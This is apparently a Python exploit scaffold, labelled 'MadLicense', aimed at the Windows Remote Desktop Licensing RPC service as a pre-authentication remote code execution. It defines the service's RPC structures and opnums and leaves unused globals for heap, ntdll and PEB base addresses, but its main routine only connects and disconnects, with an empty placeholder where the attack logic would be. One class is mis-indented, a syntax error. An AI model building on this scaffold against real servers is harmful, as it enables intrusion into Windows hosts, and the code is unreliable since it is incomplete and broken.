import struct
import hashlib
import argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR
from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Cryptodome.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey
# Interface UUID and version of the RPC service this script talks to (the
# licensing service named in DESCRIPTION), converted to binary form.
UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
# Retry count and delay; neither value is read anywhere in this file as shown.
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
# Module-level state.  Only dce and rpctransport are written (by main());
# the other names below are initialised here and never referenced in the
# visible code.
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0
# Alias used by a few NDRCALL definitions below where a single UCHAR is declared
# in place of a byte pointer.
BBYTE = UCHAR
def p8(x):
    """Pack *x* as one unsigned byte (struct format ``B``).

    Raises struct.error when *x* is outside 0..255.
    """
    packer = struct.Struct("B")
    return packer.pack(x)
def p16(x):
    """Pack *x* as an unsigned 16-bit integer (struct format ``H``).

    No byte-order prefix is given, so native order and size apply.
    Raises struct.error when *x* is outside 0..65535.
    """
    packer = struct.Struct("H")
    return packer.pack(x)
def p32(x):
    """Pack *x* as an unsigned 32-bit integer (struct format ``I``).

    No byte-order prefix is given, so native order and size apply.
    Raises struct.error when *x* does not fit in 32 bits.
    """
    packer = struct.Struct("I")
    return packer.pack(x)
def p64(x):
    """Pack *x* as an unsigned 64-bit integer (struct format ``Q``).

    No byte-order prefix is given, so native order and size apply.
    Raises struct.error when *x* does not fit in 64 bits.
    """
    packer = struct.Struct("Q")
    return packer.pack(x)
class CONTEXT_HANDLE(NDRSTRUCT):
    """RPC context handle: a single 20-byte fixed-size field."""
    structure = (
        ("Data", "20s=b"),  # 20 raw bytes; "=b" gives an empty default
    )

    def getAlignment(self):
        # Override the NDR alignment for this struct; 4-byte alignment is used.
        return 4
class TLSRpcGetVersion(NDRCALL):
    """Request for opnum 0: query the service version."""
    opnum = 0
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),  # context handle obtained from TLSRpcConnect
        ("version", PULONG),  # declared as a ULONG pointer in the request — confirm against the IDL
    )
class TLSRpcGetVersionResponse(NDRCALL):
    """Response for opnum 0: the version as a plain ULONG."""
    structure = (
        ("version", ULONG),  # service version returned by the call
    )
class TLSRpcConnect(NDRCALL):
    """Request for opnum 1: open a connection.  No input parameters are declared."""
    opnum = 1
class TLSRpcConnectResponse(NDRCALL):
    """Response for opnum 1: the context handle for the new connection."""
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),  # handle passed to later calls
    )
class TLSBLOB(NDRSTRUCT):
    """Length-prefixed byte blob (cbData bytes at pbData)."""
    structure = (
        ("cbData", ULONG),  # number of bytes in pbData
        ("pbData", PBYTE),  # pointer to the data
    )
class TLSCRYPT_ALGORITHM_IDENTIFIER(NDRSTRUCT):
    """Algorithm identifier: an OID string plus an opaque parameter blob."""
    structure = (
        ("pszObjId", LPSTR),  # object identifier as a string
        ("Parameters", TLSBLOB),  # algorithm parameters
    )
class TLSCRYPT_BIT_BLOB(NDRSTRUCT):
    """Bit-string blob: byte count, data pointer and count of unused trailing bits."""
    structure = (
        ("cbData", DWORD),  # number of bytes at pbData
        ("pbData", PBYTE),  # pointer to the bit-string bytes
        ("cUnusedBits", DWORD),  # unused bits in the last byte
    )
class TLSCERT_PUBLIC_KEY_INFO(NDRSTRUCT):
    """Public key info: algorithm identifier followed by the key bit blob."""
    structure = (
        ("Algorithm", TLSCRYPT_ALGORITHM_IDENTIFIER),  # key algorithm
        ("PublicKey", TLSCRYPT_BIT_BLOB),  # the public key bits
    )
class PTLSCERT_PUBLIC_KEY_INFO(NDRPOINTER):
    """NDR pointer whose referent is a TLSCERT_PUBLIC_KEY_INFO."""
    referent = (
        ("Data", TLSCERT_PUBLIC_KEY_INFO),  # pointed-to public key info
    )
class TLSCERT_EXTENSION(NDRSTRUCT):
    """Certificate extension: OID, critical flag and value blob."""
    structure = (
        ("pszObjId", LPSTR),  # extension object identifier as a string
        ("fCritical", BOOL),  # whether the extension is marked critical
        ("Value", TLSBLOB),  # extension value
    )
class TLSCERT_EXTENSION_ARRAY(NDRUniConformantArray):
    """Conformant array of TLSCERT_EXTENSION items."""
    item = TLSCERT_EXTENSION  # element type
class PTLSCERT_EXTENSION(NDRPOINTER):
    """NDR pointer whose referent is a TLSCERT_EXTENSION_ARRAY."""
    referent = (
        ("Data", TLSCERT_EXTENSION_ARRAY),  # pointed-to extension array
    )
class TLSHYDRACERTREQUEST(NDRSTRUCT):
    """Certificate request body sent with TLSRpcRequestTermServCert (opnum 34)."""
    structure = (
        ("dwHydraVersion", DWORD),  # request version
        ("cbEncryptedHwid", DWORD),  # byte length of pbEncryptedHwid
        ("pbEncryptedHwid", PBYTE),  # pointer to the encrypted hardware ID
        ("szSubjectRdn", PWCHAR),  # subject RDN as a wide string
        ("pSubjectPublicKeyInfo", PTLSCERT_PUBLIC_KEY_INFO),  # pointer to subject public key info
        ("dwNumCertExtension", DWORD),  # number of entries behind pCertExtensions
        ("pCertExtensions", PTLSCERT_EXTENSION),  # pointer to the extension array
    )
class PTLSHYDRACERTREQUEST(NDRPOINTER):
    """NDR pointer whose referent is a TLSHYDRACERTREQUEST.

    Not used by any NDRCALL in this file: TLSRpcRequestTermServCert declares
    pbRequest as the struct itself.
    """
    referent = (
        ("Data", TLSHYDRACERTREQUEST),  # pointed-to certificate request
    )
class TLSRpcRequestTermServCert(NDRCALL):
    """Request for opnum 34: submit a terminal server certificate request."""
    opnum = 34
    structure = (
        ("phContext", CONTEXT_HANDLE),  # context handle
        ("pbRequest", TLSHYDRACERTREQUEST),  # NOTE(review): declared by value, although PTLSHYDRACERTREQUEST exists — confirm against the IDL
        ("cbChallengeData", DWORD),  # challenge data length
        ("pdwErrCode", DWORD),  # declared as a plain DWORD here, not a pointer
    )
class TLSRpcRequestTermServCertResponse(NDRCALL):
    """Response for opnum 34: challenge data and an error code."""
    structure = (
        ("cbChallengeData", ULONG),  # byte length of pbChallengeData
        ("pbChallengeData", PBYTE),  # pointer to the challenge data
        ("pdwErrCode", ULONG),  # error code, declared as a plain ULONG here
    )
class TLSRpcRetrieveTermServCert(NDRCALL):
    """Request for opnum 35: retrieve a terminal server certificate."""
    opnum = 35
    structure = (
        ("phContext", CONTEXT_HANDLE),  # context handle
        ("cbResponseData", DWORD),  # response data length
        ("pbResponseData", BBYTE),  # NOTE(review): BBYTE is a single UCHAR, unlike the PBYTE fields elsewhere — confirm
        ("cbCert", DWORD),  # certificate length
        ("pbCert", BBYTE),  # NOTE(review): single UCHAR as above — confirm
        ("pdwErrCode", DWORD),  # declared as a plain DWORD here, not a pointer
    )
class TLSRpcRetrieveTermServCertResponse(NDRCALL):
    """Response for opnum 35: certificate length, certificate byte and error code."""
    structure = (
        ("cbCert", PUINT),  # certificate length, declared as a UINT pointer
        ("pbCert", BBYTE),  # NOTE(review): a single UCHAR (BBYTE alias), not a byte pointer — confirm
        ("pdwErrCode", PUINT),  # error code, declared as a UINT pointer
    )
class TLSRpcTelephoneRegisterLKP(NDRCALL):
    """Request for opnum 49: register a license key pack."""
    opnum = 49
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),  # context handle
        ("dwData", ULONG),  # length of the data that follows
        ("pbData", BBYTE),  # NOTE(review): a single UCHAR (BBYTE alias), not a byte pointer — confirm
        ("pdwErrCode", ULONG)  # error code, declared as a plain ULONG here
    )
# Define the response structure for the license key pack registration
class TLSRpcTelephoneRegisterLKPResponse(NDRCALL):
structure = (
("pdwErrCode", ULONG) # Pointer to error code
)
class TLSCHALLENGEDATA(NDRSTRUCT):
    """Challenge data: version, random value, challenge blob and reserved blob."""
    structure = (
        ("dwVersion", ULONG),  # structure version
        ("dwRandom", ULONG),  # random value
        ("cbChallengeData", ULONG),  # byte length of pbChallengeData
        ("pbChallengeData", PBYTE),  # pointer to the challenge bytes
        ("cbReservedData", ULONG),  # byte length of pbReservedData
        ("pbReservedData", PBYTE),  # pointer to the reserved bytes
    )
class PTLSCHALLENGEDATA(NDRPOINTER):
    """NDR pointer whose referent is a TLSCHALLENGEDATA."""
    referent = (
        ("Data", TLSCHALLENGEDATA),  # pointed-to challenge data
    )
class TLSCHALLENGEDATA_RESPONSE(NDRSTRUCT):
    """Challenge response: error code, reserved field and a challenge blob."""
    structure = (
        ("dwErrorCode", DWORD),  # error code
        ("dwReserved", ULONG),  # reserved
        ("cbChallengeData", ULONG),  # byte length of pbChallengeData
        ("pbChallengeData", PBYTE),  # pointer to the challenge bytes
    )
class PTLSCHALLENGEDATA_RESPONSE(NDRPOINTER):
    """NDR pointer whose referent is a TLSCHALLENGEDATA_RESPONSE."""
    referent = (
        ("Data", TLSCHALLENGEDATA_RESPONSE),  # pointed-to challenge response
    )
def sleep_ms(milliseconds):
    """Block the calling thread for *milliseconds* via time.sleep.

    Not called anywhere in the visible code.
    """
    seconds = milliseconds / 1000
    sleep(seconds)
def parse_args():
    """Build the command-line parser and parse sys.argv.

    -ip, -u, -p, -l, -t and -x are required; -about is a boolean flag and
    -proxy is optional.  main() reads only target, username, password and
    about; licensepack, type, challenge and proxy are parsed but not used in
    the visible code.  Note that -p puts the password on the command line,
    where it is visible in process listings and shell history.
    """
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    required_options = (
        ("-ip", "target", "Target IP address"),
        ("-u", "username", "Username"),
        ("-p", "password", "Password"),
        ("-l", "licensepack", "License Pack"),
        ("-t", "type", "License Type"),
        ("-x", "challenge", "Challenge Data"),
    )
    # Registration order is preserved so the generated help text is unchanged.
    for flag, dest, help_text in required_options:
        parser.add_argument(flag, dest=dest, help=help_text, required=True)
    parser.add_argument("-about", action="store_true", help="Show About information")
    parser.add_argument("-proxy", dest="proxy", help="Proxy address (optional)")
    return parser.parse_args()
def show_about():
    """Print the fixed 'About' text to stdout; returns None."""
    about_lines = [
        "About: ",
        "Acyber Security Assessment Team",
        "This program is designed to perform operations related to Windows Remote Desktop Licensing services.",
        "Please read the documentation carefully before using.",
    ]
    # One print of the joined text writes exactly the same bytes as four prints.
    print("\n".join(about_lines))
def main():
    """Entry point: parse arguments, then open and close an RPC connection.

    With -about the about text is printed and nothing else happens.
    Otherwise an ncacn_np (named pipe) transport for the target is created,
    the supplied username/password are set on it, and the connection is
    opened.  The try body is an empty placeholder — no RPC call is issued —
    so the script currently only connects and disconnects.  The -proxy
    argument is parsed but never used here.  Assigns the module globals
    dce and rpctransport.
    """
    global dce, rpctransport
    args = parse_args()
    if args.about:
        show_about()
        return
    binding = f"ncacn_np:{args.target}[\\termservice]"
    rpctransport = transport.DCERPCTransportFactory(binding)
    rpctransport.set_credentials(args.username, args.password, None)
    dce = rpctransport.get_dce_rpc()
    # connect() is outside the try below, so a failure here propagates uncaught.
    dce.connect()
    try:
        pass  # placeholder: no RPC logic is present in this file
    except DCERPCException as e:
        print(f"DCERPCException: {e}")
    finally:
        dce.disconnect()
if __name__ == "__main__":
    main()  # script entry point; importing the module runs nothing